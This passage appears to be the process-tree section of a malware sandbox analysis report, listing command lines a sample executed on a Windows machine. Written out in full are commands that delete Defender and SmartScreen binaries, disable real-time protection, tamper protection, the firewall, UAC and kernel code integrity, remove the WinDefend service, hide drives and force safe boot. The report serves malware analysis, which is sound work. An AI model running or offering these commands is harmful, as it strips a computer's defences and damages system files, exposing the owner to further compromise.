  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:1288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
  2⤵
  PID:1784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
  2⤵
  PID:1624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
  2⤵
  PID:1020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
  2⤵
  PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:2036
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    PID:808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
  2⤵
  PID:1996
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
    3⤵
    PID:3020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:864
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:1568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
  2⤵
  PID:2960
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
    3⤵
    PID:1696
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:924
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2144
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:1356
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2488
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
  2⤵
  PID:1088
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2292
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:1484
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:1372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2300
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2172
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
    3⤵
    PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:1928
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:640
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:1700
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:2132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1652
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
  2⤵
  PID:1348
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
    3⤵
    - Modifies firewall policy service
    PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
  2⤵
  PID:1596
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
    3⤵
    PID:2476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU' -Name 'NoAutoUpdate' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} safeboot minimal
  2⤵
  PID:304
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {current} safeboot minimal
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:2560
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f > nul
  2⤵
  PID:2816
- - C:\Windows\system32\reg.exe
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d 67108863 /f
    3⤵
    - Modifies registry key
    PID:2196
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:920
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Power" /v HiberbootEnabled /t REG_DWORD /d 0 /f
    3⤵
    PID:2700
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
  2⤵
  PID:2256
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v Notification_Suppress /t REG_DWORD /d 1 /f
    3⤵
    PID:2544
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' -Name 'Notification_Suppress' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2672
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
  2⤵
  PID:2376
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy" /v DisableNotifications /t REG_DWORD /d 1 /f
    3⤵
    PID:1960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\WindowsFirewall\Policy' -Name 'DisableNotifications' -Value 1"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c taskkill /f /im OneDrive.exe & %SystemRoot%\SysWOW64\OneDriveSetup.exe /uninstall
  2⤵
  PID:588
- - C:\Windows\system32\taskkill.exe
    taskkill /f /im OneDrive.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
  2⤵
  - Indicator Removal: Clear Persistence
  PID:580
- - C:\Windows\system32\schtasks.exe
    schtasks /delete /tn "\Microsoft\Windows\OneDrive\OneDrive Reporting" /f
    3⤵
    PID:2160
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:2520
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableNetworkProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:2576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableNetworkProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
  2⤵
  PID:2972
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
    3⤵
    PID:1792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
  2⤵
  PID:1820
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
    3⤵
    PID:2064
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
    3⤵
    PID:1624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:2300
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v PUAProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:2292
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -PUAProtection Disabled"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc delete WinDefend
  2⤵
  PID:2508
- - C:\Windows\system32\sc.exe
    sc delete WinDefend
    3⤵
    - Launches sc.exe
    PID:3036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:1920
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:2932
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
  2⤵
  PID:1640
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings" /v NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK /t REG_DWORD /d 0 /f
    3⤵
    PID:2952
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings' -Name 'NOC_GLOBAL_SETTING_ALLOW_CRITICAL_TOASTS_ABOVE_LOCK' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
  2⤵
  PID:2656
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowControlPanel /t REG_DWORD /d 0 /f
    3⤵
    PID:1688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
  2⤵
  PID:2956
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyComputer /t REG_DWORD /d 0 /f
    3⤵
    PID:2916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
  2⤵
  PID:2608
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyDocuments /t REG_DWORD /d 0 /f
    3⤵
    PID:3028
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
  2⤵
  PID:1372
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyMusic /t REG_DWORD /d 0 /f
    3⤵
    PID:2392
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
  2⤵
  PID:2364
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowMyPictures /t REG_DWORD /d 0 /f
    3⤵
    PID:1840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
  2⤵
  PID:592
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRecentDocs /t REG_DWORD /d 0 /f
    3⤵
    PID:1744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
  2⤵
  PID:2856
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowRun /t REG_DWORD /d 0 /f
    3⤵
    PID:1800
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
  2⤵
  PID:2600
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowSearch /t REG_DWORD /d 0 /f
    3⤵
    PID:2888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
  2⤵
  PID:1648
- - C:\Windows\system32\reg.exe
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_ShowUser /t REG_DWORD /d 0 /f
    3⤵
    PID:2900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c NetSh Advfirewall set allprofiles state off
  2⤵
  PID:1468
- - C:\Windows\system32\netsh.exe
    NetSh Advfirewall set allprofiles state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:444
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
  2⤵
  PID:1264
- - C:\Windows\system32\reg.exe
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f
    3⤵
    PID:860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
  2⤵
  PID:1632
- - C:\Windows\system32\reg.exe
    REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    PID:1772
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Features' -Name 'TamperProtection' -Value 0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:956
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c sc stop WinDefend
  2⤵
  PID:2212
- - C:\Windows\system32\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    PID:2560
- C:\Windows\System32\cmd.exe
